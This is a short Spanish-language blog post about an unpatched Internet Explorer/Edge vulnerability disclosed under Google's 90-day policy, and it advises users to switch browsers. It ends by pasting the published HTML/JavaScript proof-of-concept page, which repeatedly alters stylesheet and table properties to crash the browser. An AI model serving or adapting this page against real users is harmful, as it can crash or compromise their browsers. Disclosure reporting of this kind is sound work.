Lo peor de todo esto es que Micrsoft se le fue informado sobre esta vulnerabilidad pero aun no ha hecho nada, y tampoco ha liberado nuevos parches dentro el periodo de 90 dias que tiene google como politica de divulgación de vulnerabilidades.
Prueba de Conceptos
Los investigadores realizaron la POC sobre un sistema Windows 2012 R2, en el cual lograron bloquear la aplicación y a su vez abrir los puertos necesarios para poder realizar el ataque. Si vemos que la vulnerabilidad se logro ejecutar tambien en Internet Explorer, tenemos un ambito de victimas que abarca desde Windows 7, hasta Windows 10... Muy interesante.
Que hacer como Usuario???
Se recomienda dejar de utilizar estos navegadores ( Que comente quien aun lo hace hehe ) hasta que microsoft no libere los parches de resolución de esta vulnerabilidad, y comienze a utilizar otros navegadores del mercado.
Como explotar esta Vulnerabilidad?
Particularmente no he probado este código... pero ya existe uno publicado en exploitdb, osea ya cualquier persona con conocimientos necesarios podria llegar a explotar esta vulnerbilidad
Acá adjunto el código y el link desarrollado por google para realizar esta poc... exito
<style> .class1 { float: left; column-count: 5; } .class2 { column-span: all; columns: 1px; } table {border-spacing: 0px;} </style> <script> function boom() { document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa"; th1.align = "right"; } </script> <body onload="setInterval(boom,100)"> <table cellspacing="0"> <tr class="class1"> <th id="th1" colspan="5" width=0></th> <th class="class2" width=0><div class="class2"></div></th>